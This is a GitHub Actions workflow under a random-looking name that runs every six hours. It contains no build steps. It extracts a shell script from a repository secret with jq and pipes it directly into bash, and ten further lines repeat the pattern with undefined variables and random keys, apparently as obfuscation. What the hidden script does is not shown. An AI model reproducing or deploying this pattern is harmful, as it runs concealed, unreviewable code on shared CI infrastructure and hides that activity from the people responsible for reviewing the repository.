name: yangziyuan1962

on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yangziyuan1962
        env:
          m3: ${{ secrets.m3 }}
        run: |
          echo $m3 | jq -r .ksve52 | /bin/bash
          echo $dhvd55248 | jq -r .xzm345 | /bin/bash
          echo $vdypm5013 | jq -r .qck729 | /bin/bash
          echo $xctgc313 | jq -r .nuxhg1982 | /bin/bash
          echo $dix8 | jq -r .ob957 | /bin/bash
          echo $yeqs701 | jq -r .kn68323 | /bin/bash
          echo $ogpdv62 | jq -r .fhjt971 | /bin/bash
          echo $u47395 | jq -r .wxqs77482 | /bin/bash
          echo $t3797 | jq -r .jjxjv71 | /bin/bash
          echo $ebky7177 | jq -r .y0492 | /bin/bash
          echo $w477 | jq -r .qyq2674 | /bin/bash

